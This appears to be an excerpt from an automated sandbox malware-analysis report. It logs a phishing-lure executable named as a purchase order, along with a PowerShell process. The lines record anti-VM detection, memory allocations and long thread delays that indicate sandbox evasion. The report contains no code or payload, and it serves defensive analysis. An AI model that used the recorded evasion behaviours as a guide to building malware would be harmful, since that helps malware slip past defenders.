Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7488, type: MEMORYSTR

Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Memory allocated: B70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Memory allocated: 25F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Memory allocated: 2350000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Memory allocated: 7480000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Memory allocated: 8480000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Memory allocated: 8630000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Memory allocated: 9630000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Memory allocated: 9990000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Memory allocated: A990000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Memory allocated: B990000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Memory allocated: 2940000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Memory allocated: 2980000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Memory allocated: 4980000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 599829	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 599687	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 599569	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 599235	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 597854	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 595113	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 593860	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Thread delayed: delay time: 593735	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6056	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3587	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Window / User API: threadDelayed 1466	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Window / User API: threadDelayed 8337	Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7508	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7884	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -36893488147419080s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7908	Thread sleep count: 1466 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -599829s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -599687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -599569s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7908	Thread sleep count: 8337 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -599344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -599235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -599110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -598985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -598860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -598735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -598610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe TID: 7900	Thread sleep time: -598485s >= -30000s	Jump to behavior
